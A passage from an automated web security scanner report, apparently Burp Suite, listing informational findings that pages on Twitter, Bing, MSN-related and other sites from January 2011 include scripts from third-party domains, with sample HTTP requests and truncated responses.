https://si2.twimg.com/a/1296265969/javascripts/dismissable.js?1296268742
https://si2.twimg.com/a/1296265969/javascripts/geov1.js?1296268742
https://si3.twimg.com/a/1296265969/javascripts/twitter-https.js
https://www.google.com/jsapi

Request

GET /ToddKenreck HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 18:55:43 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296413743-28266-39449
ETag: "2c6078d5ad02084503ac67174803e3a9"
Last-Modified: Sun, 30 Jan 2011 18:55:43 GMT
X-Runtime: 0.01044
Content-Type: text/html; charset=utf-8
Content-Length: 38284
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296413743074695; path=/; expires=Sun, 06-Feb-11 18:55:43 GMT; domain=.twitter.com
Set-Cookie: guest_id=129641374308413366; path=/; expires=Tue, 01 Mar 2011 18:55:43 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWM0MzhkN2MzMGYwZWQ3NzcwYTZjM2RkMjRlNGM5N2M1Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI7tdH2C0B--f823c1315fc2ef2e3037c3ef689294b1c46c8564; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="https://si3.twimg.com/a/1296265969/javascripts/twitter-https.js" type="text/javascript"></script>
<script src="https://si0.twimg.com/a/1296265969/javascripts/lib/jquery.tipsy.min.js?1296268742" type="text/javascript"></script>
<script type='text/javascript' src='https://www.google.com/jsapi'></script>
<script src="https://si0.twimg.com/a/1296265969/javascripts/lib/gears_init.js?1296268742" type="text/javascript"></script>
<script src="https://si1.twimg.com/a/1296265969/javascripts/lib/mustache.js?1296268742" type="text/javascript"></script>
<script src="https://si2.twimg.com/a/1296265969/javascripts/geov1.js?1296268742" type="text/javascript"></script>
<script src="https://si0.twimg.com/a/1296265969/javascripts/api.js?1296268742" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="https://si1.twimg.com/a/1296265969/javascripts/lib/mustache.js?1296268742" type="text/javascript"></script>
<script src="https://si2.twimg.com/a/1296265969/javascripts/dismissable.js?1296268742" type="text/javascript"></script>
...[SNIP]...

23.401. http://video.fr.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://video.fr.redacted
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/MsnPost.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js

Request

GET / HTTP/1.1
Host: video.fr.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=900
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Machine: CH1********909
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.422 secs
X-Powered-By: ASP.NET
Content-Length: 170387
Age: 23
Date: Sun, 30 Jan 2011 01:51:33 GMT
Expires: Sun, 30 Jan 2011 02:06:10 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//FR" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Toutes les vidéos 
...[SNIP]...
</script><script type="text/javascript" src="http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/MsnPost.js"></script>
...[SNIP]...

23.402. http://video.uk.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://video.uk.redacted
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/MsnPost.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js

Request

GET / HTTP/1.1
Host: video.uk.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=900
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Machine: CH1********302
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.406 secs
X-Powered-By: ASP.NET
Content-Length: 114886
Age: 27
Date: Sun, 30 Jan 2011 01:51:39 GMT
Expires: Sun, 30 Jan 2011 02:06:12 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Watch free full TV 
...[SNIP]...
</script><script type="text/javascript" src="http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/MsnPost.js"></script>
...[SNIP]...

23.403. http://redcated/CNT/iview/286609711/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://redcated
Path:	/CNT/iview/286609711/direct

Issue detail

The response dynamically includes the following script from another domain:

http://cdn.doubleverify.com/script44.js?agnc=607671&cmp=CINGCP913401CNT&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=286609711&advid=607930&sid=286609711&adid=

Request

Response

23.404. http://redcated/CNT/iview/287065754/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://redcated
Path:	/CNT/iview/287065754/direct

Issue detail

The response dynamically includes the following script from another domain:

http://cdn.doubleverify.com/script44.js?agnc=607671&cmp=CINGCIN14201CNT&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=287065754&advid=607929&sid=287065754&adid=

Request

Response

23.405. http://redcated/NYC/iview/264935949/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://redcated
Path:	/NYC/iview/264935949/direct

Issue detail

The response dynamically includes the following script from another domain:

http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=166700&siteID=264935949&creativeID=197994882

Request

Response

23.406. http://visitmix.com/Labs/rosetta/eyesofblend/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://visitmix.com
Path:	/Labs/rosetta/eyesofblend/

Issue detail

The response dynamically includes the following script from another domain:

http://www.bing.com/bootstrap.js?market=en-US&ServId=SearchBox&ServId=SearchBoxWeb&Callback=WLSearchBoxScriptReady

Request

GET /Labs/rosetta/eyesofblend/ HTTP/1.1
Host: visitmix.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:27:07 GMT
Connection: close
Content-Length: 11900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><title>

...[SNIP]...
</script>

<script type="text/javascript" charset="utf-8" src="http://www.bing.com/bootstrap.js?market=en-US&ServId=SearchBox&ServId=SearchBoxWeb&Callback=WLSearchBoxScriptReady"></script>
...[SNIP]...

23.407. http://wbenedetti.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wbenedetti.newsvine.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

GET / HTTP/1.1
Host: wbenedetti.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:05:09 GMT
Server: Apache/2.2.14 (Debian)
Vary: negotiate
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=37e0e82eb5225aaf39e58b2c59ea3714; expires=Sat, 25-Jan-2031 03:05:09 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 80810

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...

23.408. http://webreflection.blogspot.com/2007/08/global-scope-evaluation-and-dom.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webreflection.blogspot.com
Path:	/2007/08/global-scope-evaluation-and-dom.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://badge.facebook.com/badge/1070526700.33.897046733.js
http://embed.technorati.com/embed/bzftjmf2gh.js
http://jqueryjs.googlecode.com/files/jquery-1.3.2.min.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.3site.eu/JPU/JPU.js
http://www.3site.eu/JSL/JSL.php
http://www.3site.eu/devpro/GoogleTranslator.js
http://www.3site.eu/devpro/JSHighLighter.js
http://www.3site.eu/devpro/bigdollar.js
http://www.3site.eu/devpro/blog.js
http://www.3site.eu/examples/jSmile.js
http://www.3site.eu/javascript/GuruMeditation.js
http://www.blogger.com/dyn-js/backlink.js?blogID=34454975&postID=5218588853177230823
http://www.blogger.com/static/v1/common/js/755007736-csitail.js
http://www.blogger.com/static/v1/v-js/1895108979-backlink_control.js
http://www.blogger.com/static/v1/v-js/979395223-backlink.js
http://www.google-analytics.com/urchin.js
http://www.ubuntu.com/files/countdown/display2.js

Request

GET /2007/08/global-scope-evaluation-and-dom.html HTTP/1.1
Host: webreflection.blogspot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Sun, 30 Jan 2011 01:51:56 GMT
Date: Sun, 30 Jan 2011 01:51:56 GMT
Last-Modified: Sat, 29 Jan 2011 16:51:37 GMT
ETag: "68641a2f-a995-496b-a3b0-3a35d5667c34"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=0, proxy-revalidate, must-revalidate
Age: 0
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>W
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://feeds.feedburner.com/WebReflection" />

<script type="text/javascript" src="http://www.3site.eu/JSL/JSL.php"></script>
<script type="text/javascript" src="http://www.3site.eu/devpro/bigdollar.js"></script>
<script type="text/javascript" src="http://www.3site.eu/devpro/JSHighLighter.js"></script>
<script type="text/javascript" src="http://www.3site.eu/devpro/blog.js"></script>
<script type="text/javascript" src="http://www.3site.eu/devpro/GoogleTranslator.js"></script>

<script type="text/javascript" src="http://www.3site.eu/JPU/JPU.js"></script>
<script type="text/javascript" src="http://www.3site.eu/javascript/GuruMeditation.js"></script>
<script type="text/javascript" src="http://jqueryjs.googlecode.com/files/jquery-1.3.2.min.js"></script>
<script type="text/javascript" src="http://www.3site.eu/examples/jSmile.js">
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www.blogger.com/dyn-css/authorization.css?targetBlogID=34454975&zx=68641a2f-a995-496b-a3b0-3a35d5667c34"/><script type="text/javascript" src="http://www.blogger.com/static/v1/v-js/979395223-backlink.js"></script>
<script type="text/javascript" src="http://www.blogger.com/static/v1/v-js/1895108979-backlink_control.js"></script>
...[SNIP]...
<dl id="comments-block">
<script type="text/javascript" src="http://www.blogger.com/dyn-js/backlink.js?blogID=34454975&postID=5218588853177230823" charset="utf-8" defer="true">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>

</div>

<script type="text/javascript" src="http://www.ubuntu.com/files/countdown/display2.js"></script>
...[SNIP]...
</ul>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
...[SNIP]...
</script>
<script src="http://badge.facebook.com/badge/1070526700.33.897046733.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://embed.technorati.com/embed/bzftjmf2gh.js"></script>
<script type="text/javascript" src="http://www.blogger.com/static/v1/common/js/755007736-csitail.js"></script>
...[SNIP]...

23.409. http://wonderwall.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wonderwall.redacted
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js
http://platform.twitter.com/widgets.js
http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js

Request

GET / HTTP/1.1
Host: wonderwall.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 23:51:44 GMT
Expires:
Pragma:
Cache-Control: public
Cache-Control: max-age=300
Vary: Accept-Encoding
Content-Type: text/html
X-Cache-Lookup: MISS from localhost:8080
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if lt IE 7]> <html class="ie ie6 lte9 lte8 lte7" xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<meta property="fb:app_id" content="111376106992" />
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js"></script>
...[SNIP]...
</script>
<script src="http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

23.410. http://wonderwall.redacted/movies/celeb-inc-for-jan-28-11106.gallery previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wonderwall.redacted
Path:	/movies/celeb-inc-for-jan-28-11106.gallery

Issue detail

The response dynamically includes the following scripts from other domains:

http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js
http://platform.twitter.com/widgets.js
http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js

Request

GET /movies/celeb-inc-for-jan-28-11106.gallery HTTP/1.1
Host: wonderwall.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 23:51:44 GMT
Expires:
Pragma:
Cache-Control: public
Cache-Control: max-age=300
Vary: Accept-Encoding
Content-Type: text/html
X-Cache-Lookup: HIT from localhost:8080
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if lt IE 7]> <html class="ie ie6 lte9 lte8 lte7" xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<meta property="fb:app_id" content="111376106992" />
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js"></script>
...[SNIP]...
</script>
<script src="http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

23.411. http://wonderwall.redacted/music/chris-brown-completes-domestic-violence-program-1594072.story previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wonderwall.redacted
Path:	/music/chris-brown-completes-domestic-violence-program-1594072.story

Issue detail

The response dynamically includes the following scripts from other domains:

http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js
http://platform.twitter.com/widgets.js
http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js

Request

GET /music/chris-brown-completes-domestic-violence-program-1594072.story HTTP/1.1
Host: wonderwall.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 23:51:58 GMT
Expires:
Pragma:
Cache-Control: public
Cache-Control: max-age=300
Vary: Accept-Encoding
Content-Type: text/html
X-Cache-Lookup: HIT from localhost:8080
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if lt IE 7]> <html class="ie ie6 lte9 lte8 lte7" xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<meta property="fb:app_id" content="111376106992" />
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js"></script>
...[SNIP]...
</script>
<script src="http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

23.412. http://wonderwall.redacted/tv/jaime-pressly-files-for-divorce-1594033.story previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wonderwall.redacted
Path:	/tv/jaime-pressly-files-for-divorce-1594033.story

Issue detail

The response dynamically includes the following scripts from other domains:

http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js
http://platform.twitter.com/widgets.js
http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js

Request

GET /tv/jaime-pressly-files-for-divorce-1594033.story HTTP/1.1
Host: wonderwall.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.413. http://wonderwall.redacted/tv/locane-pleads-not-guilty-over-fatal-car-crash-1594051.story previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wonderwall.redacted
Path:	/tv/locane-pleads-not-guilty-over-fatal-car-crash-1594051.story

Issue detail

The response dynamically includes the following scripts from other domains:

http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js
http://platform.twitter.com/widgets.js
http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js

Request

GET /tv/locane-pleads-not-guilty-over-fatal-car-crash-1594051.story HTTP/1.1
Host: wonderwall.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 23:51:48 GMT
Expires:
Pragma:
Cache-Control: public
Cache-Control: max-age=300
Vary: Accept-Encoding
Content-Type: text/html
X-Cache-Lookup: MISS from localhost:8080
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if lt IE 7]> <html class="ie ie6 lte9 lte8 lte7" xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<meta property="fb:app_id" content="111376106992" />
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js"></script>
...[SNIP]...
</script>
<script src="http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

23.414. http://wonderwall.redacted/tv/ugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wonderwall.redacted
Path:	/tv/ugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery

Issue detail

The response dynamically includes the following scripts from other domains:

http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js
http://platform.twitter.com/widgets.js
http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js

Request

GET /tv/ugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery HTTP/1.1
Host: wonderwall.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 23:51:50 GMT
Expires:
Pragma:
Cache-Control: public
Cache-Control: max-age=300
Vary: Accept-Encoding
Content-Type: text/html
X-Cache-Lookup: HIT from localhost:8080
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if lt IE 7]> <html class="ie ie6 lte9 lte8 lte7" xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<meta property="fb:app_id" content="111376106992" />
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js"></script>
...[SNIP]...
</script>
<script src="http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

23.415. http://www.asp.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.asp.net
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js

Request

GET / HTTP/1.1
Host: www.asp.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 11587
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:23:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Home: The Offic
...[SNIP]...
<link href="/rss/spotlight" type="application/rss+xml" rel="alternate" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.416. http://www.bing.com/shopping/content/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/shopping/content/search

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://adsyndication.msn.com/delivery/getads.js

Request

Response

23.417. http://www.bing.com/shopping/healthy-cooking/r/151 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/shopping/healthy-cooking/r/151

Issue detail

The response dynamically includes the following script from another domain:

http://ads1.redacted/library/dap.js

Request

Response

23.418. http://www.bing.com/shopping/valentines-day-gift-ideas/r/144 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/shopping/valentines-day-gift-ideas/r/144

Issue detail

The response dynamically includes the following script from another domain:

http://ads1.redacted/library/dap.js

Request

Response

23.419. http://www.bing.com/travel/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/travel/

Issue detail

The response dynamically includes the following script from another domain:

http://ads1.redacted/library/dap.js

Request

Response

23.420. http://www.bing.com/travel/content/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/travel/content/search

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://adsyndication.msn.com/delivery/getads.js

Request

Response

23.421. http://www.bing.com/videos/browse previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/browse

Issue detail

The response dynamically includes the following scripts from other domains:

http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js

Request

GET /videos/browse HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=209
Content-Length: 163581
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:55:47 GMT
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:17 GMT
Connection: close
Set-Cookie: _SS=SID=26F1F5B07F29471397B72F751ED12FC6; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:17 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ca859de7a417244f7a8cf721946885460; expires=Mon, 28-Jan-2013 23:52:17 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:17 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
</style><script type="text/javascript" src="http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/BingPost.js"></script>
...[SNIP]...

23.422. http://www.bing.com/videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa

Issue detail

The response dynamically includes the following scripts from other domains:

http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js

Request

Response

